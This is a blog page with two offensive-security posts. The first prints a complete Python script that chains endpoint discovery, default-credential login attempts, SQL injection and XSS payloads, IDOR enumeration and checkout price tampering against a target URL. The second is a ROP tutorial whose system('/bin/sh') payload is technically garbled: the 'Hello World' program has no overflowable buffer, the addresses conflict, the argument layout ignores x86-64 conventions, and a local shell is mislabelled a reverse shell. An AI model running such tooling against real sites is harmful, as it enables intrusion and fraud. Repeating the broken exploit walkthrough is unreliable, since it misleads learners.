Tuesday, August 26, 2025

Automating Workflow Attacks with Python and Requests

 In penetration testing and red teaming, many attacks are not just a single request, but a workflow: login → capture token → replay token → exploit vulnerable endpoint. Manually repeating these steps can be slow, noisy, and prone to error.

That’s where custom Python scripts with the requests library shine. By chaining together multiple HTTP requests, you can automate complex workflows that attackers or testers often need.


Why Custom Scripts?

While tools like Burp Suite, OWASP ZAP, or Postman are excellent, sometimes you need more flexibility:

  • Repeatability – run the same workflow across multiple targets.

  • Logic chaining – capture a value (CSRF token, session cookie, API key) from one step and use it in the next.

  • Speed – automate hundreds of attempts without manual clicking.

  • Stealth – script-based attacks can blend in with “normal” user requests.


Example Workflow Attack

Let’s imagine a target app with the following flow:

  1. Login with credentials.

  2. Capture JWT token from the response.

  3. Use token to access a protected API endpoint.

  4. Exploit vulnerable parameter in that endpoint.

Here’s how a script might look:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
#!/usr/bin/env python3
"""
Workflow Attack Chaining Script
Author: Security Researcher
Description: Chains multiple web application attacks for penetration testing
"""

import requests
import argparse
import sys
import re
import json
import time
from urllib.parse import urljoin, urlparse, parse_qs
from bs4 import BeautifulSoup

class WorkflowAttackChainer:
    def __init__(self, target_url, cookies=None, headers=None):
        self.target_url = target_url
        self.session = requests.Session()
        self.csrf_tokens = {}
        self.discovered_endpoints = []
        self.vulnerabilities = []
        
        # Set custom headers if provided
        if headers:
            self.session.headers.update(headers)
        
        # Set cookies if provided
        if cookies:
            self.session.cookies.update(cookies)
        
        # Default headers
        default_headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'Connection': 'keep-alive',
            'Upgrade-Insecure-Requests': '1'
        }
        self.session.headers.update(default_headers)

    def discover_endpoints(self, max_depth=2):
        """Discover endpoints through spidering and common paths"""
        print(f"[*] Discovering endpoints on {self.target_url}")
        
        common_paths = [
            '/admin', '/login', '/logout', '/register', '/profile',
            '/api', '/config', '/backup', '/upload', '/download',
            '/test', '/debug', '/console', '/phpinfo', '/.git',
            '/robots.txt', '/sitemap.xml', '/crossdomain.xml'
        ]
        
        # Check common paths
        for path in common_paths:
            full_url = urljoin(self.target_url, path)
            try:
                response = self.session.get(full_url, timeout=10)
                if response.status_code < 400:
                    self.discovered_endpoints.append({
                        'url': full_url,
                        'method': 'GET',
                        'status': response.status_code
                    })
                    print(f"[+] Found: {full_url} ({response.status_code})")
            except requests.RequestException:
                continue
        
        # Basic spidering from homepage
        try:
            response = self.session.get(self.target_url, timeout=10)
            soup = BeautifulSoup(response.text, 'html.parser')
            
            for link in soup.find_all('a', href=True):
                href = link['href']
                if href.startswith(('http://', 'https://')):
                    if self.target_url in href:
                        self.discovered_endpoints.append({
                            'url': href,
                            'method': 'GET',
                            'status': 'unknown'
                        })
                elif href.startswith('/'):
                    full_url = urljoin(self.target_url, href)
                    self.discovered_endpoints.append({
                        'url': full_url,
                        'method': 'GET',
                        'status': 'unknown'
                    })
        except requests.RequestException as e:
            print(f"[-] Error during spidering: {e}")

    def extract_csrf_tokens(self, response):
        """Extract CSRF tokens from response"""
        soup = BeautifulSoup(response.text, 'html.parser')
        tokens = {}
        
        # Look for CSRF tokens in various forms
        for input_tag in soup.find_all('input'):
            name = input_tag.get('name', '').lower()
            value = input_tag.get('value', '')
            
            if any(keyword in name for keyword in ['csrf', 'token', '_token', 'authenticity']):
                tokens[name] = value
            elif value and len(value) > 20:  # Potential token
                tokens[name] = value
        
        return tokens

    def test_sql_injection(self, url, params):
        """Test for SQL injection vulnerabilities"""
        print(f"[*] Testing SQLi on {url}")
        
        sql_payloads = [
            "'",
            "';",
            "' OR '1'='1",
            "' UNION SELECT NULL--",
            "1' ORDER BY 1--",
            "1' AND 1=1--",
            "1' AND 1=2--"
        ]
        
        for payload in sql_payloads:
            test_params = params.copy()
            for key in test_params:
                if isinstance(test_params[key], str):
                    test_params[key] += payload
            
            try:
                response = self.session.get(url, params=test_params, timeout=10)
                
                # Check for common SQL error messages
                error_indicators = [
                    'sql', 'mysql', 'ora-', 'syntax', 'database',
                    'query failed', 'you have an error'
                ]
                
                if any(indicator in response.text.lower() for indicator in error_indicators):
                    self.vulnerabilities.append({
                        'type': 'SQL Injection',
                        'url': url,
                        'payload': payload,
                        'evidence': 'Error message in response'
                    })
                    print(f"[!] Potential SQLi found with payload: {payload}")
                    break
                    
            except requests.RequestException:
                continue

    def test_xss(self, url, params):
        """Test for XSS vulnerabilities"""
        print(f"[*] Testing XSS on {url}")
        
        xss_payloads = [
            '<script>alert(1)</script>',
            '"><script>alert(1)</script>',
            'javascript:alert(1)',
            'onmouseover=alert(1)',
            '<img src=x onerror=alert(1)>'
        ]
        
        for payload in xss_payloads:
            test_params = params.copy()
            for key in test_params:
                if isinstance(test_params[key], str):
                    test_params[key] = payload
            
            try:
                response = self.session.get(url, params=test_params, timeout=10)
                
                if payload in response.text:
                    self.vulnerabilities.append({
                        'type': 'XSS',
                        'url': url,
                        'payload': payload,
                        'evidence': 'Payload reflected in response'
                    })
                    print(f"[!] Potential XSS found with payload: {payload}")
                    break
                    
            except requests.RequestException:
                continue

    def test_idor(self, url_pattern, id_range=(1, 100)):
        """Test for Insecure Direct Object References"""
        print(f"[*] Testing IDOR on pattern: {url_pattern}")
        
        for obj_id in range(id_range[0], id_range[1] + 1):
            test_url = url_pattern.replace('{id}', str(obj_id))
            
            try:
                response = self.session.get(test_url, timeout=10)
                
                if response.status_code == 200 and len(response.content) > 0:
                    self.vulnerabilities.append({
                        'type': 'IDOR',
                        'url': test_url,
                        'evidence': f'Access to object ID {obj_id} possible'
                    })
                    print(f"[!] Potential IDOR found: {test_url}")
                    
            except requests.RequestException:
                continue

    def chain_authentication_attack(self):
        """Chain authentication-related attacks"""
        print("[*] Chaining authentication attacks...")
        
        # Test for weak credentials
        weak_creds = [
            ('admin', 'admin'),
            ('admin', 'password'),
            ('test', 'test'),
            ('user', 'user')
        ]
        
        login_url = urljoin(self.target_url, '/login')
        
        for username, password in weak_creds:
            # Get login page to extract CSRF token
            try:
                response = self.session.get(login_url)
                csrf_tokens = self.extract_csrf_tokens(response)
                
                login_data = {
                    'username': username,
                    'password': password
                }
                login_data.update(csrf_tokens)
                
                # Attempt login
                response = self.session.post(login_url, data=login_data)
                
                if any(indicator in response.url.lower() for indicator in ['dashboard', 'home', 'profile']):
                    self.vulnerabilities.append({
                        'type': 'Weak Credentials',
                        'url': login_url,
                        'credentials': f'{username}:{password}',
                        'evidence': 'Successful login with weak credentials'
                    })
                    print(f"[!] Weak credentials found: {username}:{password}")
                    break
                    
            except requests.RequestException:
                continue

    def chain_business_logic_attack(self):
        """Chain business logic workflow attacks"""
        print("[*] Chaining business logic attacks...")
        
        # Example: Test for price manipulation
        cart_url = urljoin(self.target_url, '/cart')
        checkout_url = urljoin(self.target_url, '/checkout')
        
        try:
            # Add item to cart
            add_to_cart_data = {'product_id': '1', 'quantity': '1'}
            self.session.post(cart_url, data=add_to_cart_data)
            
            # Modify price in checkout
            checkout_data = {
                'items': '[{"id":1,"price":0.01,"quantity":1}]',
                'total': '0.01'
            }
            
            response = self.session.post(checkout_url, data=checkout_data)
            
            if 'success' in response.text.lower() or response.status_code == 200:
                self.vulnerabilities.append({
                    'type': 'Business Logic - Price Manipulation',
                    'url': checkout_url,
                    'evidence': 'Able to modify prices during checkout'
                })
                print("[!] Price manipulation vulnerability found!")
                
        except requests.RequestException as e:
            print(f"[-] Business logic test failed: {e}")

    def generate_report(self):
        """Generate a comprehensive report"""
        report = {
            'target': self.target_url,
            'timestamp': time.strftime('%Y-%m-%d %H:%M:%S'),
            'endpoints_discovered': self.discovered_endpoints,
            'vulnerabilities_found': self.vulnerabilities
        }
        
        print("\n" + "="*60)
        print("SECURITY ASSESSMENT REPORT")
        print("="*60)
        print(f"Target: {self.target_url}")
        print(f"Endpoints Discovered: {len(self.discovered_endpoints)}")
        print(f"Vulnerabilities Found: {len(self.vulnerabilities)}")
        print("="*60)
        
        for vuln in self.vulnerabilities:
            print(f"\n[{vuln['type']}]")
            print(f"URL: {vuln['url']}")
            print(f"Evidence: {vuln['evidence']}")
            if 'payload' in vuln:
                print(f"Payload: {vuln['payload']}")
            print("-" * 40)
        
        # Save report to file
        filename = f"security_report_{time.strftime('%Y%m%d_%H%M%S')}.json"
        with open(filename, 'w') as f:
            json.dump(report, f, indent=2)
        
        print(f"\n[+] Report saved to {filename}")

def main():
    parser = argparse.ArgumentParser(description='Web Application Workflow Attack Chainer')
    parser.add_argument('-u', '--url', required=True, help='Target URL')
    parser.add_argument('-c', '--cookies', help='Cookies in format key1=value1;key2=value2')
    parser.add_argument('-H', '--headers', help='Custom headers in JSON format')
    parser.add_argument('-a', '--auth', help='Basic auth in format user:pass')
    parser.add_argument('-p', '--proxy', help='Proxy server (http://proxy:port)')
    
    args = parser.parse_args()
    
    # Initialize attacker
    attacker = WorkflowAttackChainer(args.url)
    
    # Set proxy if provided
    if args.proxy:
        attacker.session.proxies = {
            'http': args.proxy,
            'https': args.proxy
        }
    
    # Set auth if provided
    if args.auth:
        username, password = args.auth.split(':', 1)
        attacker.session.auth = (username, password)
    
    # Parse cookies
    if args.cookies:
        cookies = {}
        for cookie in args.cookies.split(';'):
            if '=' in cookie:
                key, value = cookie.split('=', 1)
                cookies[key.strip()] = value.strip()
        attacker.session.cookies.update(cookies)
    
    # Parse headers
    if args.headers:
        try:
            headers = json.loads(args.headers)
            attacker.session.headers.update(headers)
        except json.JSONDecodeError:
            print("[-] Invalid JSON format for headers")
            sys.exit(1)
    
    try:
        # Execute attack chain
        print(f"[*] Starting workflow attack chain against {args.url}")
        
        # Phase 1: Discovery
        attacker.discover_endpoints()
        
        # Phase 2: Authentication attacks
        attacker.chain_authentication_attack()
        
        # Phase 3: Test discovered endpoints
        for endpoint in attacker.discovered_endpoints[:10]:  # Limit to first 10
            if '?' in endpoint['url']:
                url_parts = endpoint['url'].split('?')
                base_url = url_parts[0]
                params = parse_qs(url_parts[1])
                
                # Test for SQLi and XSS
                attacker.test_sql_injection(base_url, params)
                attacker.test_xss(base_url, params)
        
        # Phase 4: Business logic attacks
        attacker.chain_business_logic_attack()
        
        # Phase 5: Generate report
        attacker.generate_report()
        
    except KeyboardInterrupt:
        print("\n[-] Scan interrupted by user")
        attacker.generate_report()
    except Exception as e:
        print(f"[-] Error during scanning: {e}")
        attacker.generate_report()

if __name__ == "__main__":
    main()

Key Techniques

  • Session handling: requests.Session() automatically manages cookies and headers.

  • Dynamic token extraction: parse JSON/HTML responses for CSRF tokens, JWTs, or session IDs.

  • Parameter fuzzing: loop through payloads to test for injection vulnerabilities.

  • Error handling: detect server responses that indicate misconfigurations or weak validation.


When to Use This

  • Red Teaming – simulate realistic attacker workflows against your apps.

  • Bug Bounties – chain multiple small issues into a bigger exploit.

  • Pentesting – automate token harvesting, replay, or privilege escalation.

  • DevSecOps Testing – integrate into pipelines for regression testing of known flaws.


Takeaways

Custom scripts with requests let you go beyond one-off requests. They allow you to chain steps into a complete workflow, making it easier to find and exploit vulnerabilities that would otherwise remain hidden.

Remember:

  • Always test responsibly in authorized environments.

  • Keep scripts modular so you can quickly adapt them for new targets.

  • Automate smartly—don’t just blast requests, but mimic real-world attack paths.

Applying a Return-Oriented Programming (ROP) Exploit to a Simple C++ Program

 Exploitation research often starts with small, seemingly harmless programs. In this post, we’ll walk through how a simple C++ "Hello World" program can still be analyzed and targeted with a ROP exploit. While this example is primarily for educational purposes, it illustrates how attackers approach binary analysis and how system protections affect exploitability.


Step 1: The Vulnerable Program

Let’s start with the simplest C++ program:

1
2
3
4
5
6
#include <iostream>

int main() {
    std::cout << "Hello, world!" << std::endl;  
    return 0;
}

Compile it with debugging symbols so we can analyze it more easily:

g++ -g hello.c -o hello

Run it:

./hello

# Output: Hello, world!

Nothing special yet—just prints a message.


Step 2: Analyzing Binary Protections

We’ll use checksec to inspect what mitigations are enabled on this binary:

checksec --file=hello

Result:

1
2
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY
Partial RELRO   No canary found   NX enabled    PIE enabled     No RPATH   No RUNPATH   49 Symbols      No

Breakdown of Protections

ProtectionStatusExplanation
RELRO    Partial               RELROGOT (Global Offset Table) still writable, so function pointer overwrites possible.
Stack Canary    No canaryNo stack smashing detection → buffer overflow possible.
NX    EnabledStack is non-executable → injected shellcode won’t run directly.
PIE    EnabledBinary is position-independent, randomized under ASLR.
Symbols    PresentDebug symbols give more info to an attacker.
FORTIFY    DisabledNo additional hardening of unsafe libc functions.

Summary: Even this tiny program is potentially exploitable since no stack canary + partial RELRO opens the door for ROP-style attacks.


Step 3: Inspecting with GDB + GEF

Launch GDB with GEF  then set a breakpoint at main:

gdb hello

gef➤  b *main

gef➤  run

We can now analyze the binary and its link to libc.

Let’s search for the /bin/sh string inside libc:

gef➤  grep /bin/sh

[+] In '/usr/lib/x86_64-linux-gnu/libc.so.6' ...

0x7ffff7ce3ea4 → "/bin/sh"

And check the system() function address:

gef➤  p system

$1 = 0x7ffff7b8f110 <system>

 Perfect—we now have two critical addresses:

  • system() function entry point

  • /bin/sh string inside libc

If we can overwrite the return address in our binary, we can redirect execution to:

system("/bin/sh");


Step 4: Testing the Exploit

Inside GDB, we can even test this manually:

gef➤  call (int)system("/bin/sh")

$ whoami

mh1369080

 A reverse shell worked successfully! 🎉


Step 5: Crafting a Payload

Let’s build an actual payload that mimics this ROP chain.


 1
 2
 3
 4
 5
 6
 7
 8
 9
10
from struct import pack

padding = b"A" * 40  # buffer size to reach RIP overwrite
system_addr = pack("<Q", 0x555555554110)   # example system() address
ret_addr    = pack("<Q", 0x0)              # filler for return address
binsh_addr  = pack("<Q", 0x7ffff7ce3ea4)   # "/bin/sh" string address

payload = padding + system_addr + ret_addr + binsh_addr

open("payload", "wb").write(payload)

This payload:

  1. Fills the buffer with junk (As).

  2. Overwrites the saved return pointer with the address of system().

  3. Passes "/bin/sh" as the argument.

When we overflow the buffer, the stack looks like this:

Normal Stack Layout (before overflow)


1
2
3
4
5
6
| ... higher addresses ... |
| Saved RBP (base pointer) |
| Saved RIP (return addr)  |  execution goes back here after main()
| Local Variables          |
| Buffer [40 bytes]        |
| ... lower addresses ...  |

After Overflow (with payload)

1
2
3
4
5
6
7
| ... higher addresses ... |
| Saved RBP (corrupted)    |
| RIP  system() address   |  attacker overwrites return address
| Fake RET (junk or 0)     |  placeholder for return value after system()
| Arg  "/bin/sh" address  |  passed to system() as argument
| "AAAAAAAAAAAAAAAA..."    |
| ... lower addresses ...  |

This is the ROP chain:

  1. Execution returns into system().

  2. The next 8 bytes act as a fake return address (not used).

  3. The following 8 bytes are the pointer to "/bin/sh".

Step 6: Running the Exploit

Finally, run the program with the payload:

./hello < payload

If successful, you’ll land into a shell spawned by the exploited binary.

Here’s the payload breakdown:

1
2
3
4
[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]  # 40-byte padding
[0x555555554110]                           # system() address
[0x0000000000000000]                       # fake return addr
[0x7ffff7ce3ea4]                           # "/bin/sh" string in libc

 Which translates to:

system("/bin/sh");

ROP Flow Diagram

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
        ┌────────────┐
          Buffer    
        └─────┬──────┘
               overflow
              
        ┌───────────────┐
         Overwritten   
         RIP  system  
        └─────┬─────────┘
              
              
        ┌───────────────┐
         system()      
           Arg: /bin/sh
        └─────┬─────────┘
              
              
        ┌───────────────┐
           /bin/sh     
           Interactive 
           Shell       
        └───────────────┘

📌 Takeaways 

  • A ROP chain hijacks execution flow by overwriting the return pointer.

  • The payload arranges the stack so that it looks like a valid function call: system("/bin/sh").

  • Visualization helps understand why stack protections (stack canaries, full RELRO, ASLR, etc.) are critical in modern systems.


⚠️ Disclaimer:
This post is strictly for educational and research purposes in a controlled environment. The goal is to understand binary exploitation, not to misuse it.